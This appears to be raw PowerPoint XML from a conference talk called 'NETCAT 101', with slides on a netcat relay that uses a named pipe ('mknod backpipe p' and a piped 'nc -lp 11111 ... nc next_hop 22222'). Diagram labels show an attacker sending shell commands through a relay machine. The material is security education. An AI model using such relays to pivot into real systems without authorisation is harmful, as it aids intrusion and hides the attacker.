              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Netcat 2D Relay (Unix Backpipe Approach)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mknod backpipe p</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc –lp 11111 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0&lt;backpipe | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc next_hop 22222 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>1&gt;backpipe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Diagram 8"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="960929144"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="464745" y="3437962"/>
          <a:ext cx="1752600"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6" name="Diagram 15"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4142308797"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7086600" y="3429000"/>
          <a:ext cx="1752600" cy="2514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8" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="3429000"/>
            <a:ext cx="4267200" cy="2590800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Relay Machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="386110" y="2971800"/>
            <a:ext cx="2095445" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Attacker Types here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587947" y="6096000"/>
            <a:ext cx="1545653" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Attacker sees </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>response here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7114784" y="6096000"/>
            <a:ext cx="1750787" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Shell gets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>commands here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="2971800"/>
            <a:ext cx="2152490" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Shell responses here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="4191000"/>
            <a:ext cx="1219200" cy="990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t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 11111</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5334000" y="4191000"/>
            <a:ext cx="1219200" cy="990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t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>next_hop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 22222</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="5486400"/>
            <a:ext cx="1219200" cy="3810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t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>backpipe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="4343400"/>
            <a:ext cx="0" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="0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597934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55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Bob McArdle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" err="1" smtClean="0"/>
              <a:t>BobMcArdle</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Cork | Sec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>NETCAT 101</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48277287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334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Netcat 2D Relay (Unix Backpipe Approach)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mknod backpipe p</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc –lp 11111 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0&lt;backpipe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc next_hop 22222 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>1&gt;backpipe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Diagram 8"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3294174793"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="464745" y="3437962"/>
          <a:ext cx="1752600"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6" name="Diagram 15"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1375131948"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7086600" y="3429000"/>
          <a:ext cx="1752600" cy="2514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8" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="3429000"/>
            <a:ext cx="4267200" cy="2590800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Relay Machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="386110" y="2971800"/>
            <a:ext cx="2095445" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Attacker Types here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587947" y="6096000"/>
            <a:ext cx="1545653" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Attacker sees </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>response here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7114784" y="6096000"/>
            <a:ext cx="1750787" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Shell gets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>commands here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="2971800"/>
            <a:ext cx="2152490" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Shell responses here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="4191000"/>
            <a:ext cx="1219200" cy="990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t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 11111</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5334000" y="4191000"/>
            <a:ext cx="1219200" cy="990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t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>next_hop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 22222</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="5486400"/>
            <a:ext cx="1219200" cy="3810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t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>backpipe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="4343400"/>
            <a:ext cx="0" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200"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6" name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1896858" y="3294929"/>
            <a:ext cx="5456865" cy="2517328"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 94140 w 5456865"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2517328"/>
              <a:gd name="connsiteX1" fmla="*/ 94140 w 5456865"/>
              <a:gd name="connsiteY1" fmla="*/ 1304243 h 2517328"/>
              <a:gd name="connsiteX2" fmla="*/ 1072475 w 5456865"/>
              <a:gd name="connsiteY2" fmla="*/ 1613142 h 2517328"/>
              <a:gd name="connsiteX3" fmla="*/ 1415750 w 5456865"/>
              <a:gd name="connsiteY3" fmla="*/ 2436875 h 2517328"/>
              <a:gd name="connsiteX4" fmla="*/ 2497068 w 5456865"/>
              <a:gd name="connsiteY4" fmla="*/ 2402552 h 2517328"/>
              <a:gd name="connsiteX5" fmla="*/ 2754524 w 5456865"/>
              <a:gd name="connsiteY5" fmla="*/ 1698948 h 2517328"/>
              <a:gd name="connsiteX6" fmla="*/ 2754524 w 5456865"/>
              <a:gd name="connsiteY6" fmla="*/ 926699 h 2517328"/>
              <a:gd name="connsiteX7" fmla="*/ 2823180 w 5456865"/>
              <a:gd name="connsiteY7" fmla="*/ 858054 h 2517328"/>
              <a:gd name="connsiteX8" fmla="*/ 3629877 w 5456865"/>
              <a:gd name="connsiteY8" fmla="*/ 514833 h 2517328"/>
              <a:gd name="connsiteX9" fmla="*/ 4419410 w 5456865"/>
              <a:gd name="connsiteY9" fmla="*/ 1012504 h 2517328"/>
              <a:gd name="connsiteX10" fmla="*/ 4848505 w 5456865"/>
              <a:gd name="connsiteY10" fmla="*/ 1561659 h 2517328"/>
              <a:gd name="connsiteX11" fmla="*/ 5414909 w 5456865"/>
              <a:gd name="connsiteY11" fmla="*/ 1561659 h 2517328"/>
              <a:gd name="connsiteX12" fmla="*/ 5414909 w 5456865"/>
              <a:gd name="connsiteY12" fmla="*/ 2282425 h 2517328"/>
              <a:gd name="connsiteX13" fmla="*/ 5414909 w 5456865"/>
              <a:gd name="connsiteY13" fmla="*/ 2316747 h 251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56865" h="2517328">
                <a:moveTo>
                  <a:pt x="94140" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12612" y="517693"/>
                  <a:pt x="-68916" y="1035386"/>
                  <a:pt x="94140" y="1304243"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="257196" y="1573100"/>
                  <a:pt x="852207" y="1424370"/>
                  <a:pt x="1072475" y="1613142"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1292743" y="1801914"/>
                  <a:pt x="1178318" y="2305307"/>
                  <a:pt x="1415750" y="2436875"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1653182" y="2568443"/>
                  <a:pt x="2273939" y="2525540"/>
                  <a:pt x="2497068" y="2402552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2720197" y="2279564"/>
                  <a:pt x="2711615" y="1944923"/>
                  <a:pt x="2754524" y="1698948"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2797433" y="1452973"/>
                  <a:pt x="2743081" y="1066848"/>
                  <a:pt x="2754524" y="926699"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2765967" y="786550"/>
                  <a:pt x="2677288" y="926698"/>
                  <a:pt x="2823180" y="858054"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2969072" y="789410"/>
                  <a:pt x="3363839" y="489091"/>
                  <a:pt x="3629877" y="514833"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3895915" y="540575"/>
                  <a:pt x="4216305" y="838033"/>
                  <a:pt x="4419410" y="1012504"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4622515" y="1186975"/>
                  <a:pt x="4682589" y="1470133"/>
                  <a:pt x="4848505" y="1561659"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5014421" y="1653185"/>
                  <a:pt x="5320508" y="1441531"/>
                  <a:pt x="5414909" y="1561659"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5509310" y="1681787"/>
                  <a:pt x="5414909" y="2282425"/>
                  <a:pt x="5414909" y="2282425"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5414909" y="2316747"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="57150" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="0000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Isosceles Triangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7162800" y="5562600"/>
            <a:ext cx="304800" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">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696424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334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Netcat 2D Relay (Unix Backpipe Approach)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mknod backpipe p</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc –lp 11111 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0&lt;backpipe </a:t>
            </a:r>
            <a:r>
